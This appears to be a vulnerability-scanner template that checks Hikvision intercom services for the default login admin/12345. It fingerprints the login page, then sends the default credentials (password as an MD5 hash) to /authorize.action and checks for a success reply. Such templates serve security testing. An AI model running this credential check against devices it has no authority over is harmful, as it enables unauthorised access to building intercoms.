id: hikvision-intercom-service-default-password

info:
    name: Hikvision Intercom Service Default Password
    author: xueba(user/pass=admin/12345)
    severity: high

rules:
    r0:
        request:
            method: GET
            path: /
        expression: response.status == 200 && response.body.bcontains(bytes("document.title = LOGIN_BTN_LOGIN"))
    r1:
        request:
            method: POST
            path: /authorize.action
            body: |
                username=admin&userpsw=827ccb0eea8a706c4c34a16891f84e7b&language=zh_cn
        expression: 'response.status == 200 && response.body.bcontains(b"{\"success\": true, \"msg\": \"OK\"}")'
expression: r0() && r1()

